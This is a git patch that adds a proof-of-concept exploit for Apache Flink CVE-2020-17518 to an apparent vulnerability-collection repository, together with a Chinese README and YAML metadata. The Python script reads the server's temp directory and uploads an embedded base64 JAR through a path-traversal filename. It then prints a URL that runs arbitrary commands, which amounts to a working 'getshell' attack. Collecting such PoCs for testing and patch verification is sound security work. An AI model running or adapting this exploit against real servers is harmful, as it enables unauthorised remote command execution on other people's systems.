From f03ad6df9bcfc8dc27433fac7a010ca156ff802b Mon Sep 17 00:00:00 2001 From: me-zz Date: Wed, 15 Mar 2023 03:14:55 -0700 Subject: [PATCH] add CVE-2020-17518 --- .../2020/CVE-2020-17518/CVE-2020-17518.py | 30 +++++++++++++++++++ .../2020/CVE-2020-17518/README.md | 10 +++++++ .../2020/yaml/CVE-2020-17518.yaml | 19 ++++++++++++ openkylin_list.yaml | 4 ++- 4 files changed, 62 insertions(+), 1 deletion(-) create mode 100755 cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py create mode 100644 cve/apache-Flink/2020/CVE-2020-17518/README.md create mode 100644 cve/apache-Flink/2020/yaml/CVE-2020-17518.yaml diff --git a/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py b/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py new file mode 100755 index 00000000..c78850f5 --- /dev/null +++ b/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py @@ -0,0 +1,30 @@ +import requests +import base64 +import json +import sys +import cStringIO +#jar_code="UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA" +def main(): + if len(sys.argv) == 1 or sys.argv[1] == '-h': + print('Usage :python2 flink-getshell.py http://example.com:8081') + exit() + url = sys.argv[1] + jobmanager_config_dir = url + '/jobmanager/config' + upload_jar_url = url + "/jars/upload" + r1 = requests.get(jobmanager_config_dir,verify=False) + #data = json.loads(req.text)[2]['value'] + data = json.loads(r1.text) + for i in data: + #print(i['key']) + if i['key'] == "web.tmpdir": + flink_webdir = i['value'] + print("webdir:%s" % flink_webdir) + file_content = base64.b64decode('UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA') + files = {'jarfile': ('../../../../../..%s/flink-web-upload/new1.jar' % flink_webdir, cStringIO.StringIO(file_content), 'application/octet-stream')} + r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False) + print('the shell:%s/jars/new1.jar/run?entry-class=Execute&program-args="command"' % url) + +if __name__ == "__main__": + main() + + diff --git a/cve/apache-Flink/2020/CVE-2020-17518/README.md b/cve/apache-Flink/2020/CVE-2020-17518/README.md new file mode 100644 index 00000000..ab9a6351 --- /dev/null +++ b/cve/apache-Flink/2020/CVE-2020-17518/README.md @@ -0,0 +1,10 @@ +# Flink-文件上传 +Apache Flink 文件上传 +#Use +Apache Flink是美国阿帕奇软件(Apache)基金会的一款开源的分布式流数据处理引擎。Apache Flink 1.5.1 引入了一个 REST 处理程序,它允许你通过恶意修改的 HTTP 标头将上传的文件写入本地文件系统上的任意位置。这些文件可以写入 Flink 1.5.1 可访问的任何位置。 + +# eg +python flink-getshell.py http://example.com:8081 + +# reference +code from: https://github.com/rakjong/Flink-CVE-2020-17518-getshell diff --git a/cve/apache-Flink/2020/yaml/CVE-2020-17518.yaml b/cve/apache-Flink/2020/yaml/CVE-2020-17518.yaml new file mode 100644 index 00000000..4fa625d4 --- /dev/null +++ b/cve/apache-Flink/2020/yaml/CVE-2020-17518.yaml @@ -0,0 +1,19 @@ +id: CVE-2020-17518 +source: https://github.com/rakjong/Flink-CVE-2020-17518-getshell +info: + name: Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。 + severity: high + description: + 在Apache Flink1.5.1中引入了 REST 处理程序,允许通过恶意修改HTTP HEADER将上传的文件写入本地文件系统上的任意位置。攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置。 + scope-of-influence: + Apache Flink 1.5.1-1.11.2 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2020-17518 + - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2020-17518 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.5 + cve-id: CVE-2020-17518 + cnvd-id: None + kve-id: None + tags: cve2020, Apache, Flink, Upload diff --git a/openkylin_list.yaml b/openkylin_list.yaml index efffaf70..8e492dd7 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -18,6 +18,8 @@ cve: - CVE-2020-1938 apache-Spark: - CVE-2022-33891 + apache-Flink: + - CVE-2020-17518 apache-tomcat: - CVE-2020-13935 Influx-DB: @@ -114,4 +116,4 @@ kve: kylin-display-switch: - KVE-2022-0206 kylin-activation: - - KVE-2022-0231 \ No newline at end of file + - KVE-2022-0231